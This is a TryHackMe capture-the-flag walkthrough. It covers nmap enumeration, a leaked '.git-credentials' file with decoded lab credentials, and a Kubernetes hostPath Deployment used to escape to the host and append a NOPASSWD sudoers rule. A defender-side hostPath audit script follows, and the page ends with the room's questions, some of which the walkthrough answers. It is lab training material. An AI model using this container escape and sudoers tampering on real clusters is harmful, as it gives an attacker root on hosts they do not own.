
[Frank & Herby Make an App] - TryHackMe - Walkthrough
A guide to the TryHackMe room [Frank & Herby Make an App]
Learn how the misconfiguration of containers can lead to opportunities for some and disasters for others.
Nmap scan report for 10.10.2.161
Host is up, received reset ttl 61 (0.097s latency).
Scanned at 2022-05-20 01:37:14 EDT for 28s
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 64:79:10:0d:72:67:23:80:4a:1a:35:8e:0b:ec:a1:89 (RSA)
| 256 3b:0e:e7:e9:a5:1a:e4:c5:c7:88:0d:fe:ee:ac:95:65 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNX+QRguEL4oz+kogQzTSjnw/avVHwIvCK4QwTJmettBooLnWqE3JafmjtuKXJiGKe+8f0v6wYbLnwM2fy4EcSo=
| 256 d8:a7:16:75:a7:1b:26:5c:a9:2e:3f:ac:c0:ed:da:5c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM5D29NgPRAP6UHvWfviHmkXUvTGAk9r2c+JcknWvle7
3000/tcp open ppp? syn-ack ttl 61
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Content-Type-Options: nosniff
| X-Frame-Options: sameorigin
| Content-Security-Policy: default-src 'self' ; connect-src *; font-src 'self' data:; frame-src *; img-src * data:; media-src * data:; script-src 'self' 'unsafe-eval' ; style-src 'self' 'unsafe-inline'
| X-Instance-ID: 9s5xKsmLBvYEiMi5u
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Fri, 20 May 2022 05:37:27 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/a3e89fa2bdd3f98d52e474085bb1d61f99c0684d.css?meteor_css_resource=true">
| <meta charset="utf-8" />
| <meta http-equiv="content-type" content="text/html; charset=utf-8" />
| <meta http-equiv="expires" content="-1" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="fragment" content="!" />
| <meta name="distribution" content
| HTTPOptions:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Content-Type-Options: nosniff
| X-Frame-Options: sameorigin
| Content-Security-Policy: default-src 'self' ; connect-src *; font-src 'self' data:; frame-src *; img-src * data:; media-src * data:; script-src 'self' 'unsafe-eval' ; style-src 'self' 'unsafe-inline'
| X-Instance-ID: 9s5xKsmLBvYEiMi5u
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Fri, 20 May 2022 05:37:28 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/a3e89fa2bdd3f98d52e474085bb1d61f99c0684d.css?meteor_css_resource=true">
| <meta charset="utf-8" />
| <meta http-equiv="content-type" content="text/html; charset=utf-8" />
| <meta http-equiv="expires" content="-1" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="fragment" content="!" />
|_ <meta name="distribution" content
31337/tcp open http syn-ack ttl 60 nginx 1.21.3
|_http-title: Heroic Features - Start Bootstrap Template
|_http-server-header: nginx/1.21.3
| http-methods:
|_ Supported Methods: GET HEAD
Here we can see there's a web server running on port 31337. Browsing to this port confirms it's the port Question 1 is referring to. Now we continue to enumerate; we know we're looking for a hidden file or directory, since the context clue is that the answer to Question 2 starts with a '.'. Breaking out any decent brute-force tool discovers the hidden file '.git-credentials', and we have the answer to Question 2.

The contents of '.git-credentials' are 'http://frank:f%40an3-1s-E337%21%21@192.168.100.10/'. Note that a portion of the user frank's password is URL-encoded; decoding it reveals the username 'frank' and the password 'f@an3-1s-E337!!'.
These happen to be the SSH credentials as well, so the user flag is waiting for us immediately. Simply run cat user.txt.
Now it's time to pop root on this machine and get the hell out of here. If you noticed, the entire theme was supposed to be Kubernetes, so eventually you'll find a Kubernetes deployment template in frank's folder at /home/frank/repos/dk-ml/test.yaml. Like Docker containers, Kubernetes containers can mount the host's filesystem back into the pod with root privileges, and we can use that to escalate. Here's how you'd modify this test.yaml template to do just that.
/home/frank/repos/ml-d/test.yaml:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: exploit
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        volumeMounts:
        - name: local-stuff
          mountPath: /opt/root
        image: localhost:32000/bsnginx
        ports:
        - containerPort: 80
        command:
        - "/bin/bash"
        - "-c"
        - "sleep 10000"
      volumes:
      - name: local-stuff
        hostPath:
          path: /
          type: Directory
Other than the obvious command, note that the volume is a hostPath of / and we change its mount path to /opt/root. Now run these commands:
Deploy a container using the template:
microk8s kubectl apply -f test.yaml
List the pods to make sure the pod has finished spinning up:
microk8s kubectl get pod
Once you see it, go ahead and jump into the pod:
microk8s kubectl exec -it <our_malicious_pod> -- /bin/bash
Now remember we mounted the host's root filesystem at /opt/root, so jump on over to /opt/root/etc:
cd /opt/root/etc
And since we don't have the most common editors, let's pollute the sudoers file for the frank user:
echo "frank ALL=(ALL:ALL) NOPASSWD: ALL" >> sudoers
Now just exit out of the pod, back onto the host, and run sudo su -, and welcome to root, dear friends. Go ahead and read the root flag. Happy Hacking!
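As an added defender-side check, not code from the room or this walkthrough: the audit below reads the JSON that `kubectl get deployments -A -o json` prints and flags any workload that mounts a hostPath volume the way the test.yaml above does, rating a read-write mount of the host root as HIGH. The SENSITIVE path list and the embedded sample Deployment are constructed for the example.

```python
# Added defender-side audit, not code from the room: it walks the JSON that
# `kubectl get deployments -A -o json` prints and flags pod templates that
# mount a hostPath volume (above all the host root, as the room's test.yaml does).
import json

# Host paths that, mounted read-write, hand the pod control of the node (constructed list).
SENSITIVE = ("/etc", "/root", "/var/run/docker.sock", "/var/lib/kubelet")

def _is_sensitive(path):
    norm = path.rstrip("/") or "/"  # "/" and "//" both name the host root
    return norm == "/" or any(norm == p or norm.startswith(p + "/") for p in SENSITIVE)

def _pod_spec(item):
    """Pod spec of a bare Pod or of a templated workload (Deployment, DaemonSet, ...)."""
    spec = item.get("spec", {})
    return spec.get("template", {}).get("spec", spec)

def audit_item(item):
    """Return (severity, message) findings for one API object."""
    meta = item.get("metadata", {})
    name = f'{meta.get("namespace", "default")}/{meta.get("name", "?")}'
    pod, findings, writable = _pod_spec(item), [], set()
    for c in pod.get("containers", []):
        # A mount without readOnly: true lets the pod write to the host path.
        writable |= {m["name"] for m in c.get("volumeMounts", []) if not m.get("readOnly")}
        if c.get("securityContext", {}).get("privileged"):
            findings.append(("HIGH", f"{name}: container {c['name']} is privileged"))
    for vol in pod.get("volumes", []):
        hp = vol.get("hostPath")
        if hp is None:
            continue
        mode = "read-write" if vol["name"] in writable else "read-only"
        sev = "HIGH" if _is_sensitive(hp.get("path", "")) else "MEDIUM"
        findings.append((sev, f"{name}: hostPath {hp.get('path')!r} mounted {mode}"))
    return findings

def audit(kubectl_json):
    """Audit a kubectl List (or one object) and return every finding."""
    doc = json.loads(kubectl_json)
    return [f for item in doc.get("items", [doc]) for f in audit_item(item)]

# Constructed sample: the room's 'exploit' Deployment as kubectl -o json would show it.
SAMPLE = json.dumps({"kind": "List", "items": [{"kind": "Deployment",
    "metadata": {"name": "exploit", "namespace": "default"},
    "spec": {"template": {"spec": {
        "containers": [{"name": "nginx", "image": "localhost:32000/bsnginx",
                        "volumeMounts": [{"name": "local-stuff", "mountPath": "/opt/root"}]}],
        "volumes": [{"name": "local-stuff", "hostPath": {"path": "/", "type": "Directory"}}]}}}}]})
```

The Pod Security Standards baseline profile already rejects hostPath volumes, so labelling the namespace with pod-security.kubernetes.io/enforce: baseline stops this Deployment at admission rather than after the fact.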
Task 1 Frank & Herby Make an App!
Make sure to wait 5 minutes after the machine starts up before starting recon.
Containers are really cool, but they have security considerations just like everything else. Break into the box and then figure out how to get root access!
This box will require some research into how to use microk8s.
Our story so far...
Two developers are venturing into the world of Kubernetes. Little do these developers know that their lack of understanding in 'k8s', containers, and git has left their resources open to exploitation!
Answer the questions below
What did frank leave exposed on the site?
What is the user.txt flag?
What is the root.txt flag?